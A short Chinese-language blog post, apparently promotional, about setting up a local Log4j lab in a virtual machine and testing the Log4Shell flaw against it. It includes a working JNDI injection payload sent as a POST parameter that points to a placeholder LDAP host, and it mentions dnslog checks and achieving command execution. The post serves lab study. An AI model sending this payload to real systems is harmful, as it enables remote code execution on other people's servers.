搜索公众号:白帽子左一,每天更新技术干货!
作者:掌控安全——月月大魔王
log4j环境下载,请在公众号(白帽子左一)后台回复:“log4j环境”获取
之前log4j漏洞出来的时候,我问了我的同学,他们正好用过这个,我就麻烦我同学打包了一个发给我
我自己试了一下,还是可以用的,自己也尝试命令执行了,也能成功
我虚拟机用的是win7的,装的java1.8的环境
如果没装java环境,我把我用的放在压缩包里了(带java环境的压缩包,一直上传不了,我就删掉了,可以找找自己本机的安装包还在不在试一下)
解压压缩包,打开test文件,有个run.bat直接双击,然后稍等一下就可以了
这里留了一个接口
浏览器访问,地址就是虚拟机的地址
保证你主机和虚机能互通就行,我这边每次虚机能ping主机,但是主机都ping不通虚机,每次都要禁用虚机网卡再启用,有点麻烦
xx.xx.xx.xx:8888/lengbo/base
POST传参
name=${jndi:ldap://xxxx/exp}
这样就是可以了,之后就是想办法传递POST数据
先看dnslog
让后去传递POST参数
虚拟机里看log4j反应
查看dnslog
有兴趣的小伙伴可以试一下,亲测是可以做到命令执行的,可以自己虚拟机里研究一下
log4j环境下载,请在公众号(白帽子左一)后台回复:“log4j环境”获取
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
